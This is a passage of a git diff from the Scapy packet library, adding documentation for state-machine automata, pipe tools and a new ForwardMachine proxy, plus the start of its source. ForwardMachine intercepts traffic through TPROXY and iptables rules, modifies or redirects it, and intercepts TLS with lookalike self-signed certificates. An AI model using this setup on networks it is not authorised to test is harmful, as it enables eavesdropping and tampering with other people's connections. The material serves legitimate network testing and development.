``Automaton`` can be reset using ``restart()``. It is then possible to run it again. + +.. warning:: Remember to call ``destroy()`` once you're done using an Automaton. (especially on PyPy) + +Changing states +--------------- + +The ``ATMT.state`` decorator transforms a method into a function that returns an exception. If you raise that exception, the automaton state will be changed. If the change occurs in a transition, actions bound to this transition will be called. The parameters given to the function replacing the method will be kept and finally delivered to the method. The exception has a method action_parameters that can be called before it is raised so that it will store parameters to be delivered to all actions bound to the current transition. + +As an example, let's consider the following state:: + + @ATMT.state() + def MY_STATE(self, param1, param2): + print("state=MY_STATE. param1=%r param2=%r" % (param1, param2)) + +This state will be reached with the following code:: + + @ATMT.receive_condition(ANOTHER_STATE) + def received_ICMP(self, pkt): + if ICMP in pkt: + raise self.MY_STATE("got icmp", pkt[ICMP].type) + +Let's suppose we want to bind an action to this transition, that will also need some parameters:: + + @ATMT.action(received_ICMP) + def on_ICMP(self, icmp_type, icmp_code): + self.retaliate(icmp_type, icmp_code) + +The condition should become:: + + @ATMT.receive_condition(ANOTHER_STATE) + def received_ICMP(self, pkt): + if ICMP in pkt: + raise self.MY_STATE("got icmp", pkt[ICMP].type).action_parameters(pkt[ICMP].type, pkt[ICMP].code) + +Real example +------------ + +Here is a real example take from Scapy. It implements a TFTP client that can issue read requests. + +.. image:: ../graphics/ATMT_TFTP_read.* + +:: + + class TFTP_read(Automaton): + def parse_args(self, filename, server, sport = None, port=69, **kargs): + Automaton.parse_args(self, **kargs) + self.filename = filename + self.server = server + self.port = port + self.sport = sport + + def master_filter(self, pkt): + return ( IP in pkt and pkt[IP].src == self.server and UDP in pkt + and pkt[UDP].dport == self.my_tid + and (self.server_tid is None or pkt[UDP].sport == self.server_tid) ) + + # BEGIN + @ATMT.state(initial=1) + def BEGIN(self): + self.blocksize=512 + self.my_tid = self.sport or RandShort()._fix() + bind_bottom_up(UDP, TFTP, dport=self.my_tid) + self.server_tid = None + self.res = b"" + + self.l3 = IP(dst=self.server)/UDP(sport=self.my_tid, dport=self.port)/TFTP() + self.last_packet = self.l3/TFTP_RRQ(filename=self.filename, mode="octet") + self.send(self.last_packet) + self.awaiting=1 + + raise self.WAITING() + + # WAITING + @ATMT.state() + def WAITING(self): + pass + + @ATMT.receive_condition(WAITING) + def receive_data(self, pkt): + if TFTP_DATA in pkt and pkt[TFTP_DATA].block == self.awaiting: + if self.server_tid is None: + self.server_tid = pkt[UDP].sport + self.l3[UDP].dport = self.server_tid + raise self.RECEIVING(pkt) + @ATMT.action(receive_data) + def send_ack(self): + self.last_packet = self.l3 / TFTP_ACK(block = self.awaiting) + self.send(self.last_packet) + + @ATMT.receive_condition(WAITING, prio=1) + def receive_error(self, pkt): + if TFTP_ERROR in pkt: + raise self.ERROR(pkt) + + @ATMT.timeout(WAITING, 3) + def timeout_waiting(self): + raise self.WAITING() + @ATMT.action(timeout_waiting) + def retransmit_last_packet(self): + self.send(self.last_packet) + + # RECEIVED + @ATMT.state() + def RECEIVING(self, pkt): + recvd = pkt[Raw].load + self.res += recvd + self.awaiting += 1 + if len(recvd) == self.blocksize: + raise self.WAITING() + raise self.END() + + # ERROR + @ATMT.state(error=1) + def ERROR(self,pkt): + split_bottom_up(UDP, TFTP, dport=self.my_tid) + return pkt[TFTP_ERROR].summary() + + #END + @ATMT.state(final=1) + def END(self): + split_bottom_up(UDP, TFTP, dport=self.my_tid) + return self.res + +It can be run like this, for instance:: + + >>> atmt = TFTP_read("my_file", "192.168.1.128") + >>> atmt.run() + >>> atmt.destroy() + +Detailed documentation +---------------------- + +Decorators +^^^^^^^^^^ +Decorator for states +~~~~~~~~~~~~~~~~~~~~ + +States are methods decorated by the result of the ``ATMT.state`` function. It can take 4 optional parameters, ``initial``, ``final``, ``stop`` and ``error``, that, when set to ``True``, indicating that the state is an initial, final, stop or error state. + +.. note:: The ``initial`` state is called while starting the automata. The ``final`` step will tell the automata has reached its end. If you call ``atmt.stop()``, the automata will move to the ``stop`` step whatever its current state is. The ``error`` state will mark the automata as errored. If no ``stop`` state is specified, calling ``stop`` and ``forcestop`` will be equivalent. + +:: + + class Example(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + pass + + @ATMT.state() + def SOME_STATE(self): + pass + + @ATMT.state(final=1) + def END(self): + return "Result of the automaton: 42" + + @ATMT.state(stop=1) + def STOP(self): + print("SHUTTING DOWN...") + # e.g. close sockets... + + @ATMT.condition(STOP) + def is_stopping(self): + raise self.END() + + @ATMT.state(error=1) + def ERROR(self): + return "Partial result, or explanation" + # [...] + +Take for instance the TCP client: + +.. image:: ../graphics/ATMT_TCP_client.svg + +The ``START`` event is ``initial=1``, the ``STOP`` event is ``stop=1`` and the ``CLOSED`` event is ``final=1``. + +Decorators for transitions +~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.eof``, ``ATMT.timeout``, ``ATMT.timer``. They all take as argument the state method they are related to. ``ATMT.timeout`` and ``ATMT.timer`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. The difference between ``ATMT.timeout`` and ``ATMT.timer`` is that ``ATMT.timeout`` gets triggered only once. ``ATMT.timer`` get reloaded automatically, which is useful for sending keep-alive packets. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. + +When the automaton switches to a given state, the state's method is executed. Then transitions methods are called at specific moments until one triggers a new state (something like ``raise self.MY_NEW_STATE()``). First, right after the state's method returns, the ``ATMT.condition`` decorated methods are run by growing prio. Then each time a packet is received and accepted by the master filter all ``ATMT.receive_condition`` decorated hods are called by growing prio. When a timeout is reached since the time we entered into the current space, the corresponding ``ATMT.timeout`` decorated method is called. If the socket raises an ``EOFError`` (closed) during a state, the ``ATMT.EOF`` transition is called. Otherwise it raises an exception and the automaton exits. + +:: + + class Example(Automaton): + @ATMT.state() + def WAITING(self): + pass + + @ATMT.condition(WAITING) + def it_is_raining(self): + if not self.have_umbrella: + raise self.ERROR_WET() + + @ATMT.receive_condition(WAITING, prio=1) + def it_is_ICMP(self, pkt): + if ICMP in pkt: + raise self.RECEIVED_ICMP(pkt) + + @ATMT.receive_condition(WAITING, prio=2) + def it_is_IP(self, pkt): + if IP in pkt: + raise self.RECEIVED_IP(pkt) + + @ATMT.timeout(WAITING, 10.0) + def waiting_timeout(self): + raise self.ERROR_TIMEOUT() + +Decorator for actions +~~~~~~~~~~~~~~~~~~~~~ + +Actions are methods that are decorated by the return of ``ATMT.action`` function. This function takes the transition method it is bound to as first parameter and an optional priority ``prio`` as a second parameter. The default priority is 0. An action method can be decorated many times to be bound to many transitions. + +:: + + from random import random + + class Example(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + pass + + @ATMT.state(final=1) + def END(self): + pass + + @ATMT.condition(BEGIN, prio=1) + def maybe_go_to_end(self): + if random() > 0.5: + raise self.END() + + @ATMT.condition(BEGIN, prio=2) + def certainly_go_to_end(self): + raise self.END() + + @ATMT.action(maybe_go_to_end) + def maybe_action(self): + print("We are lucky...") + + @ATMT.action(certainly_go_to_end) + def certainly_action(self): + print("We are not lucky...") + + @ATMT.action(maybe_go_to_end, prio=1) + @ATMT.action(certainly_go_to_end, prio=1) + def always_action(self): + print("This wasn't luck!...") + +The two possible outputs are:: + + >>> a=Example() + >>> a.run() + We are not lucky... + This wasn't luck!... + >>> a.run() + We are lucky... + This wasn't luck!... + >>> a.destroy() + + +.. note:: If you want to pass a parameter to an action, you can use the ``action_parameters`` function while raising the next state. + +In the following example, the ``send_copy`` action takes a parameter passed by ``is_fin``:: + + class Example(Automaton): + @ATMT.state() + def WAITING(self): + pass + + @ATMT.state() + def FIN_RECEIVED(self): + pass + + @ATMT.receive_condition(WAITING) + def is_fin(self, pkt): + if pkt[TCP].flags.F: + raise self.FIN_RECEIVED().action_parameters(pkt) + + @ATMT.action(is_fin) + def send_copy(self, pkt): + send(pkt) + + +Methods to overload +^^^^^^^^^^^^^^^^^^^ + +Two methods are hooks to be overloaded: + +* The ``parse_args()`` method is called with arguments given at ``__init__()`` and ``run()``. Use that to parametrize the behavior of your automaton. + +* The ``master_filter()`` method is called each time a packet is sniffed and decides if it is interesting for the automaton. When working on a specific protocol, this is where you will ensure the packet belongs to the connection you are being part of, so that you do not need to make all the sanity checks in each transition. + +Timer configuration +^^^^^^^^^^^^^^^^^^^ + +Some protocols allow timer configuration. In order to configure timeout values during class initialization one may use ``timer_by_name()`` method, which returns ``Timer`` object associated with the given function name:: + + class Example(Automaton): + def __init__(self, *args, **kwargs): + super(Example, self).__init__(*args, **kwargs) + timer = self.timer_by_name("waiting_timeout") + timer.set(1) + + @ATMT.state(initial=1) + def WAITING(self): + pass + + @ATMT.state(final=1) + def END(self): + pass + + @ATMT.timeout(WAITING, 10.0) + def waiting_timeout(self): + raise self.END() \ No newline at end of file diff --git a/doc/scapy/advanced_usage/fwdmachine.rst b/doc/scapy/advanced_usage/fwdmachine.rst new file mode 100644 index 00000000000..d51594c1b0e --- /dev/null +++ b/doc/scapy/advanced_usage/fwdmachine.rst @@ -0,0 +1,133 @@ +****************** +Forwarding Machine +****************** + +Scapy's ``ForwardMachine`` is a utility that allows to create server that forwards packets to another server, with the ability +to modify them on-the-fly. This is similar to a "proxy", but works with any protocols over IP/IPv6. The ``ForwardMachine`` was initially designed to be used with TPROXY, +a linux feature that allows to bind a socket that received *packets to any IP destination* (in which case it properly forwards the packet to the initially +intended destination), but it also work as a standalone server. + +A ``ForwardMachine`` is expected to be used over a normal Python socket, of any kind, and needs to extended with two +functions: ``xfrmcs`` and ``xfrmsc``. The first one is called whenever data is received from the client side (client-to-server), the other when the data +is received from the server. + +``ForwardMachine`` can be used in two modes: + +- **TPROXY** +- **SERVER**, in which case a normal socket is bound. Think of it as a glorified socat + +Basic usage +___________ + +Here's an example of a ``ForwardMachine`` over TPROXY that does nothing. Packets for all destinations are handled, and forwarded to their +initial destinations afterwards. More details on how to setup TPROXY are provided below. + +.. code:: python + + from scapy.fwdmachine import ForwardMachine + from scapy.layers.http import HTTP + + class NOPFwdMachine(ForwardMachine): + def xfrmcs(self, pkt, ctx): + pkt.show() # we print the client->server packets + raise self.FORWARD() + + def xfrmsc(self, pkt, ctx): + pkt.show() # we print the server->client packets + raise self.FORWARD() + + # Run it + NOPFwdMachine( + mode=ForwardMachine.MODE.TPROXY, + port=80, + cls=HTTP, # we specify the class of the payload we are receiving + ).run() + +The callback classes use **Operations** to tell the ``ForwardMachine`` what to do with the incoming data. + +.. figure:: ../graphics/fwdmachine.svg + :align: center + + The main operations available in a Forwarding machine, in this case in ``xfrmcs``. + +There are currently 5 operations available: + +- **FORWARD**: forward the received payload to the destination intended by the peer; +- **FORWARD_REPLACE**: forward a modified payload to the intended destination; +- **DROP**: drop the received payload; +- **ANSWER**: answer the peer directly with a payload, without forwarding its original payload to the other peer; +- **REDIRECT_TO**: (client-side only) redirects the connection of the client towards a new remote peer. + +The ``ctx`` attribute in the callbacks contains context relative to the current client. It can also be use to +store additional data specific to the session. + +If we were to use this machine in SERVER mode, we would call it like: + +.. code:: python + + NOPFwdMachine( + mode=ForwardMachine.MODE.SERVER, + port=12345, + bind_address="0.0.0.0", # the address we bind on + remote_address="192.168.0.1", # the server to redirect this to by default + cls=conf.raw_layer, # Default Raw layer: we don't know the type of data + ).run() + +TLS support +___________ + +``ForwardMachine`` has support for TLS through the ``ssl=True`` argument. When TLS is enabled, the SNI (Server Name Indication) is +properly forwarded to the remote peer, and can be accessed through the ``ctx.tls_sni_name`` attribute in the callbacks. + +**By default, a ForwardMachine generates self-signed certificates** that copy the attributes from the certificate of the remote +server. This behavior can be changed by specifying a certificate (which will be served by the TLS stack). + +We can run the same ForwardMachine as from the previous example, this time with self-signed TLS. + +.. code:: python + + # Run it + NOPFwdMachine( + mode=ForwardMachine.MODE.SERVER, + port=443, + cls=HTTP, + ssl=True, + ).run() + +Configuring TPROXY +__________________ + +TPROXY is a special socket mode that allows to bind a socket that listens for traffic that isn't directed at a local address. This is typically used by "transparent TLS proxies" to achieve their functionality, and is expected to be setup on a linux router. + +The ``ForwardingMachine`` supports TPROXY, which allows to intercept and modify all the traffic by many clients to many destinations, for instance on a specific port. This is much more versatile that a classic bind + socket, which would typically forward multiple clients to a single destination. + +Here are the steps: + +- Setup an interface that one can redirect traffic to, and that has TPROXY support. +- Bind the ``ForwardingMachine`` on that interface. +- Redirect some traffic to that interface, using ``iptables`` or ``nftables``, based on some arbitrary criteria. + +For ease of use, a script ``vethrelay.sh`` is provided to setup a veth (virtual ethernet) interface that can be used to bind the ``ForwardingMachine`` on. This script is available at https://github.com/secdev/scapy/blob/master/doc/scapy/_static/vethrelay.sh + +.. code:: bash + + ./vethrelay.sh setup + Interface vethrelay is now setup with IPv4: 2.2.2.2 ! + + Add listening rules as follow: + + # TPROXY incoming TCP packets on port 80 to vethrelay on port 8080 + iptables -t mangle -A PREROUTING -p tcp --dport 80 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 8080 --on-ip 2.2.2.2 + + # Listen on wlp4s0 for incoming packets on port 80 (on the interface where it really comes from) + iptables -A INPUT -i wlp4s0 -p tcp --dport 80 -j ACCEPT + +As the instructions say, to have traffic to anything on the port 80 go through the ``ForwardingMachine``, one can run the commands listed above assuming that the machine is started as such: + +.. code:: python + + NOPFwdMachine( + mode=ForwardMachine.MODE.TPROXY, + port=8080, + cls=HTTP, + ).run() diff --git a/doc/scapy/advanced_usage/index.rst b/doc/scapy/advanced_usage/index.rst new file mode 100644 index 00000000000..0e617423fc6 --- /dev/null +++ b/doc/scapy/advanced_usage/index.rst @@ -0,0 +1,10 @@ +.. Advanced usage documentation + +Advanced usage +============== + +.. toctree:: + :glob: + :titlesonly: + + * \ No newline at end of file diff --git a/doc/scapy/advanced_usage/pipetools.rst b/doc/scapy/advanced_usage/pipetools.rst new file mode 100644 index 00000000000..dbc7b6ce23a --- /dev/null +++ b/doc/scapy/advanced_usage/pipetools.rst @@ -0,0 +1,347 @@ +.. _pipetools: + +PipeTools +========= + +Scapy's ``pipetool`` is a smart piping system allowing to perform complex stream data management. + +The goal is to create a sequence of steps with one or several inputs and one or several outputs, with a bunch of blocks in between. +PipeTools can handle varied sources of data (and outputs) such as user input, pcap input, sniffing, wireshark... +A pipe system is implemented by manually linking all its parts. It is possible to dynamically add an element while running or set multiple drains for the same source. + +.. note:: Pipetool default objects are located inside ``scapy.pipetool`` + +Demo: sniff, anonymize, send to Wireshark +----------------------------------------- + +The following code will sniff packets on the default interface, anonymize the source and destination IP addresses and pipe it all into Wireshark. Useful when posting online examples, for instance. + +.. code-block:: python3 + + source = SniffSource(iface=conf.iface) + wire = WiresharkSink() + def transf(pkt): + if not pkt or IP not in pkt: + return pkt + pkt[IP].src = "1.1.1.1" + pkt[IP].dst = "2.2.2.2" + return pkt + + source > TransformDrain(transf) > wire + p = PipeEngine(source) + p.start() + p.wait_and_stop() + +The engine is pretty straightforward: + +.. image:: ../graphics/pipetool_demo.svg + +Let's run it: + +.. image:: ../graphics/animations/pipetool_demo.gif + +Class Types +----------- + +There are 3 different class of objects used for data management: + +- ``Sources`` +- ``Drains`` +- ``Sinks`` + +They are executed and handled by a :class:`~scapy.pipetool.PipeEngine` object. + +When running, a pipetool engine waits for any available data from the Source, and send it in the Drains linked to it. +The data then goes from Drains to Drains until it arrives in a Sink, the final state of this data. + +Let's see with a basic demo how to build a pipetool system. + +.. image:: ../graphics/pipetool_engine.png + +For instance, this engine was generated with this code: + +.. code:: pycon + + >>> s = CLIFeeder() + >>> s2 = CLIHighFeeder() + >>> d1 = Drain() + >>> d2 = TransformDrain(lambda x: x[::-1]) + >>> si1 = ConsoleSink() + >>> si2 = QueueSink() + >>> + >>> s > d1 + >>> d1 > si1 + >>> d1 > si2 + >>> + >>> s2 >> d1 + >>> d1 >> d2 + >>> d2 >> si1 + >>> + >>> p = PipeEngine() + >>> p.add(s) + >>> p.add(s2) + >>> p.graph(target="> the_above_image.png") + +``start()`` is used to start the :class:`~scapy.pipetool.PipeEngine`: + +.. code:: pycon + + >>> p.start() + +Now, let's play with it by sending some input data + +.. code:: pycon + + >>> s.send("foo") + >'foo' + >>> s2.send("bar") + >>'rab' + >>> s.send("i like potato") + >'i like potato' + >>> print(si2.recv(), ":", si2.recv()) + foo : i like potato + +Let's study what happens here: + +- there are **two canals** in a :class:`~scapy.pipetool.PipeEngine`, a lower one and a higher one. Some Sources write on the lower one, some on the higher one and some on both. +- most sources can be linked to any drain, on both lower and higher canals. The use of ``>`` indicates a link on the low canal, and ``>>`` on the higher one. +- when we send some data in ``s``, which is on the lower canal, as shown above, it goes through the :class:`~scapy.pipetool.Drain` then is sent to the :class:`~.scapy.pipetool.QueueSink` and to the :class:`~scapy.pipetool.ConsoleSink` +- when we send some data in ``s2``, it goes through the Drain, then the TransformDrain where the data is reversed (see the lambda), before being sent to :class:`~scapy.pipetool.ConsoleSink` only. This explains why we only have the data of the lower sources inside the QueueSink: the higher one has not been linked. + +Most of the sinks receive from both lower and upper canals. This is verifiable using the `help(ConsoleSink)` + +.. code:: pycon + + >>> help(ConsoleSink) + Help on class ConsoleSink in module scapy.pipetool: + class ConsoleSink(Sink) + | Print messages on low and high entries + | +-------+ + | >>-|--. |->> + | | print | + | >-|--' |-> + | +-------+ + | + [...] + + +Sources +^^^^^^^ + +A Source is a class that generates some data. + +There are several source types integrated with Scapy, usable as-is, but you may +also create yours. + +Default Source classes +~~~~~~~~~~~~~~~~~~~~~~ + +For any of those class, have a look at ``help([theclass])`` to get more information or the required parameters. + +- :class:`~scapy.pipetool.CLIFeeder` : a source especially used in interactive software. its ``send(data)`` generates the event data on the lower canal +- :class:`~scapy.pipetool.CLIHighFeeder` : same than CLIFeeder, but writes on the higher canal +- :class:`~scapy.pipetool.PeriodicSource` : Generate messages periodically on the low canal. +- :class:`~scapy.pipetool.AutoSource`: the default source, that must be extended to create custom sources. + +Create a custom Source +~~~~~~~~~~~~~~~~~~~~~~ + +To create a custom source, one must extend the :class:`~scapy.pipetool.AutoSource` class. + +.. note:: + + Do NOT use the default :class:`~scapy.pipetool.Source` class except if you are really sure of what you are doing: it is only used internally, and is missing some implementation. The :class:`~scapy.pipetool.AutoSource` is made to be used. + + +To send data through it, the object must call its ``self._gen_data(msg)`` or ``self._gen_high_data(msg)`` functions, which send the data into the PipeEngine. + +The Source should also (if possible), set ``self.is_exhausted`` to ``True`` when empty, to allow the clean stop of the :class:`~scapy.pipetool.PipeEngine`. If the source is infinite, it will need a force-stop (see PipeEngine below) + +For instance, here is how :class:`~scapy.pipetool.CLIHighFeeder` is implemented: + +.. code:: python3 + + class CLIFeeder(CLIFeeder): + def send(self, msg): + self._gen_high_data(msg) + def close(self): + self.is_exhausted = True + +Drains +^^^^^^ + +Default Drain classes +~~~~~~~~~~~~~~~~~~~~~ + +Drains need to be linked on the entry that you are using. It can be either on the lower one (using ``>``) or the upper one (using ``>>``). +See the basic example above. + +- :class:`~scapy.pipetool.Drain` : the most basic Drain possible. Will pass on both low and high entry if linked properly. +- :class:`~scapy.pipetool.TransformDrain` : Apply a function to messages on low and high entry +- :class:`~scapy.pipetool.UpDrain` : Repeat messages from low entry to high exit +- :class:`~scapy.pipetool.DownDrain` : Repeat messages from high entry to low exit + +Create a custom Drain +~~~~~~~~~~~~~~~~~~~~~ + +To create a custom drain, one must extend the :class:`~scapy.pipetool.Drain` class. + +A :class:`~scapy.pipetool.Drain` object will receive data from the lower canal in its ``push`` method, and from the higher canal from its ``high_push`` method. + +To send the data back into the next linked Drain / Sink, it must call the ``self._send(msg)`` or ``self._high_send(msg)`` methods. + +For instance, here is how :class:`~scapy.pipetool.TransformDrain` is implemented:: + + class TransformDrain(Drain): + def __init__(self, f, name=None): + Drain.__init__(self, name=name) + self.f = f + def push(self, msg): + self._send(self.f(msg)) + def high_push(self, msg): + self._high_send(self.f(msg)) + +Sinks +^^^^^ + +Sinks are destinations for messages. + +A :py:class:`~scapy.pipetool.Sink` receives data like a :py:class:`~scapy.pipetool.Drain`, but doesn't send any +messages after it. + +Messages on the low entry come from :py:meth:`~scapy.pipetool.Sink.push`, and messages on the +high entry come from :py:meth:`~scapy.pipetool.Sink.high_push`. + +Default Sinks classes +~~~~~~~~~~~~~~~~~~~~~ + +- :class:`~scapy.pipetool.ConsoleSink` : Print messages on low and high entries to ``stdout`` +- :class:`~scapy.pipetool.RawConsoleSink` : Print messages on low and high entries, using os.write +- :class:`~scapy.pipetool.TermSink` : Prints messages on the low and high entries, on a separate terminal +- :class:`~scapy.pipetool.QueueSink` : Collects messages on the low and high entries into a :py:class:`Queue` + +Create a custom Sink +~~~~~~~~~~~~~~~~~~~~ + +To create a custom sink, one must extend :py:class:`~scapy.pipetool.Sink` and implement +:py:meth:`~scapy.pipetool.Sink.push` and/or :py:meth:`~scapy.pipetool.Sink.high_push`. + +This is a simplified version of :py:class:`~scapy.pipetool.ConsoleSink`: + +.. code-block:: python3 + + class ConsoleSink(Sink): + def push(self, msg): + print(">%r" % msg) + def high_push(self, msg): + print(">>%r" % msg) + +Link objects +------------ + +As shown in the example, most sources can be linked to any drain, on both low +and high entry. + +The use of ``>`` indicates a link on the low entry, and ``>>`` on the high +entry. + +For example, to link ``a``, ``b`` and ``c`` on the low entries: + +.. code-block:: pycon + + >>> a = CLIFeeder() + >>> b = Drain() + >>> c = ConsoleSink() + >>> a > b > c + >>> p = PipeEngine() + >>> p.add(a) + +This wouldn't link the high entries, so something like this would do nothing: + +.. code-block:: pycon + + >>> a2 = CLIHighFeeder() + >>> a2 >> b + >>> a2.send("hello") + +Because ``b`` (:py:class:`~scapy.pipetool.Drain`) and ``c`` (:py:class:`scapy.pipetool.ConsoleSink`) are not +linked on the high entry. + +However, using a :py:class:`~scapy.pipetool.DownDrain` would bring the high messages from +:py:class:`~scapy.pipetool.CLIHighFeeder` to the lower channel: + +.. code-block:: pycon + + >>> a2 = CLIHighFeeder() + >>> b2 = DownDrain() + >>> a2 >> b2 + >>> b2 > b + >>> a2.send("hello") + +The PipeEngine class +-------------------- + +The :class:`~scapy.pipetool.PipeEngine` class is the core class of the Pipetool system. It must be initialized and passed the list of all Sources. + +There are two ways of passing sources: + +- during initialization: ``p = PipeEngine(source1, source2, ...)`` +- using the ``add(source)`` method + +A :class:`~scapy.pipetool.PipeEngine` class must be started with ``.start()`` function. It may be force-stopped with the ``.stop()``, or cleanly stopped with ``.wait_and_stop()`` + +A clean stop only works if the Sources is exhausted (has no data to send left). + +It can be printed into a graph using ``.graph()`` methods. see ``help(do_graph)`` for the list of available keyword arguments. + +Scapy advanced PipeTool objects +------------------------------- + +.. note:: Unlike the previous objects, those are not located in ``scapy.pipetool`` but in ``scapy.scapypipes`` + +Now that you know the default PipeTool objects, here are some more advanced ones, based on packet functionalities. + +- :class:`~scapy.scapypipes.SniffSource` : Read packets from an interface and send them to low exit. +- :class:`~scapy.scapypipes.RdpcapSource` : Read packets from a PCAP file send them to low exit. +- :class:`~scapy.scapypipes.InjectSink` : Packets received on low input are injected (sent) to an interface +- :class:`~scapy.scapypipes.WrpcapSink` : Packets received on low input are written to PCAP file +- :class:`~scapy.scapypipes.UDPDrain` : UDP payloads received on high entry are sent over UDP (complicated, have a look at ``help(UDPDrain)``) +- :class:`~scapy.scapypipes.FDSourceSink` : Use a file descriptor as source and sink +- :class:`~scapy.scapypipes.TCPConnectPipe`: TCP connect to addr:port and use it as source and sink +- :class:`~scapy.scapypipes.TCPListenPipe` : TCP listen on [addr:]port and use the first connection as source and sink (complicated, have a look at ``help(TCPListenPipe)``) + +Triggering +---------- + +Some special sort of Drains exists: the Trigger Drains. + +Trigger Drains are special drains, that on receiving data not only pass it by but also send a "Trigger" input, that is received and handled by the next triggered drain (if it exists). + +For example, here is a basic :class:`~scapy.scapypipes.TriggerDrain` usage: + +.. code:: pycon + + >>> a = CLIFeeder() + >>> d = TriggerDrain(lambda msg: True) # Pass messages and trigger when a condition is met + >>> d2 = TriggeredValve() + >>> s = ConsoleSink() + >>> a > d > d2 > s + >>> d ^ d2 # Link the triggers + >>> p = PipeEngine(s) + >>> p.start() + INFO: Pipe engine thread started. + >>> + >>> a.send("this will be printed") + >'this will be printed' + >>> a.send("this won't, because the valve was switched") + >>> a.send("this will, because the valve was switched again") + >'this will, because the valve was switched again' + >>> p.stop() + +Several triggering Drains exist, they are pretty explicit. It is highly recommended to check the doc using ``help([the class])`` + +- :class:`~scapy.scapypipes.TriggeredMessage` : Send a preloaded message when triggered and trigger in chain +- :class:`~scapy.scapypipes.TriggerDrain` : Pass messages and trigger when a condition is met +- :class:`~scapy.scapypipes.TriggeredValve` : Let messages alternatively pass or not, changing on trigger +- :class:`~scapy.scapypipes.TriggeredQueueingValve` : Let messages alternatively pass or queued, changing on trigger +- :class:`~scapy.scapypipes.TriggeredSwitch` : Let messages alternatively high or low, changing on trigger diff --git a/doc/scapy/graphics/fwdmachine.drawio b/doc/scapy/graphics/fwdmachine.drawio new file mode 100644 index 00000000000..bb9caacaadd --- /dev/null +++ b/doc/scapy/graphics/fwdmachine.drawio @@ -0,0 +1,135 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/doc/scapy/graphics/fwdmachine.svg b/doc/scapy/graphics/fwdmachine.svg new file mode 100644 index 00000000000..e9d06349c43 --- /dev/null +++ b/doc/scapy/graphics/fwdmachine.svg @@ -0,0 +1,3 @@ + + +
      Client
      Client
      Server
      192.168.0.1
      Server192.168.0.1
      ForwardingMachine
      Forwarding...
      FORWARD
      FORWARD
      DROP
      DROP
      data
      data
      FORWARD_REPLACE
      FORWARD_REPLACE
      data
      data
      data
      data
      data
      data
      ANSWER
      ANSWER
      Other server
      192.168.0.2
      Other server192.168....
      REDIRECT_TO
      REDIRECT_TO       \ No newline at end of file diff --git a/doc/scapy/index.rst b/doc/scapy/index.rst index 3fceb6ca558..a7ae7f7d082 100644 --- a/doc/scapy/index.rst +++ b/doc/scapy/index.rst @@ -24,7 +24,7 @@ Scapy's documentation is under a `Creative Commons Attribution - Non-Commercial installation usage - advanced_usage + advanced_usage/index.rst routing .. toctree:: diff --git a/scapy/config.py b/scapy/config.py index a692a6d4efe..1a70b7cf440 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1129,6 +1129,8 @@ class Conf(ConfClass): #: Windows SSPs for sniffing. This is used with #: dcerpc_session_enable winssps_passive = [] + #: Disables auto-stripping of StrFixedLenField for debugging purposes + debug_strfixedlenfield = False def __getattribute__(self, attr): # type: (str) -> Any diff --git a/scapy/fields.py b/scapy/fields.py index 56e280b25c5..46064b726e2 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1865,7 +1865,7 @@ def __init__( name, # type: str default, # type: Optional[bytes] length=None, # type: Optional[int] - length_from=None, # type: Optional[Callable[[Packet], int]] # noqa: E501 + length_from=None, # type: Optional[Callable[[Packet], int]] ): # type: (...) -> None super(StrFixedLenField, self).__init__(name, default) @@ -1879,7 +1879,7 @@ def i2repr(self, v, # type: bytes ): # type: (...) -> str - if isinstance(v, bytes): + if isinstance(v, bytes) and not conf.debug_strfixedlenfield: v = v.rstrip(b"\0") return super(StrFixedLenField, self).i2repr(pkt, v) diff --git a/scapy/fwdmachine.py b/scapy/fwdmachine.py new file mode 100644 index 00000000000..04060b02cc3 --- /dev/null +++ b/scapy/fwdmachine.py @@ -0,0 +1,498 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Forwarding machine. +""" + +import enum +import functools +import os +import select +import socket +import ssl +import threading +import traceback + +from scapy.asn1.asn1 import ASN1_OID +from scapy.config import conf +from scapy.data import MTU +from scapy.packet import Packet +from scapy.supersocket import StreamSocket, StreamSocketPeekless +from scapy.themes import DefaultTheme +from scapy.utils import get_temp_file +from scapy.volatile import RandInt + +from scapy.layers.tls.all import ( + Cert, + PrivKeyECDSA, +) +from scapy.layers.x509 import ( + X509_AlgorithmIdentifier, +) + +from cryptography.hazmat.primitives import serialization + +# Typing imports +from typing import ( + Type, + Optional, +) + + +class ForwardMachine: + """ + Forward Machine + + This binds a port and relay any connections from 'clients' to + their original destination a 'server'. Forwarding machine can be used in + two modes: + + - SERVER: the server binds a port on its local IP and forwards packets to a + ``remote_address``. + - TPROXY: the server binds can intercept packets to any IP destination, provided + that they are routed through the local server, and some tweaking of the OS + routes; + + The TPROXY mode is expected to be used on a router with FORWARDING and only a + specific set of nat rules set to -j TPROXY. A script called 'vethrelay.sh' + is provided in the documentation for setting this up. + + ForwardMachine supports transparently proxifying TLS. By default, it will generate + lookalike self-signed certificates, but it's also possible to specify a certificate + by using crtfile and keyfile. + + Parameters: + + :param port: the port to listen on + :param cls: the scapy class to parse on that port + :param af: the address family to use (default AF_INET) + :param proto: the proto to use (default SOCK_STREAM) + :param remote_address: the IP to use in SERVER mode, or by default in TPROXY when + the destination is the local IP. + :param remote_af: (optional) if provided, use a different address family to connect + to the remote host. + :param bind_address: the IP to bind locally. "0.0.0.0" by default in SERVER mode, + but "2.2.2.2" by default in TPROXY (if you are using the provided + 'vethrelay.sh' script). + :param tls: enable TLS (in both the server and client) + :param crtfile: (optional) if provided, uses a certificate instead of self signed + ones. + :param keyfile: (optional) path to the key file + :param timeout: the timeout before connecting to the real server (default 2) + + Methods to override: + + :func xfrmcs: a function to call when forwarding a packet from the 'client' to + the server. If it returns True, the packet is forwarded as it. If it + returns False or None, 